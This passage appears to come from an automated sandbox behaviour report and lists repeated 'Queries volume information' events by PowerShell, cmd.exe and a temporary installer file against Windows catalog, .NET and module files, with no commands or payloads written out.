Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
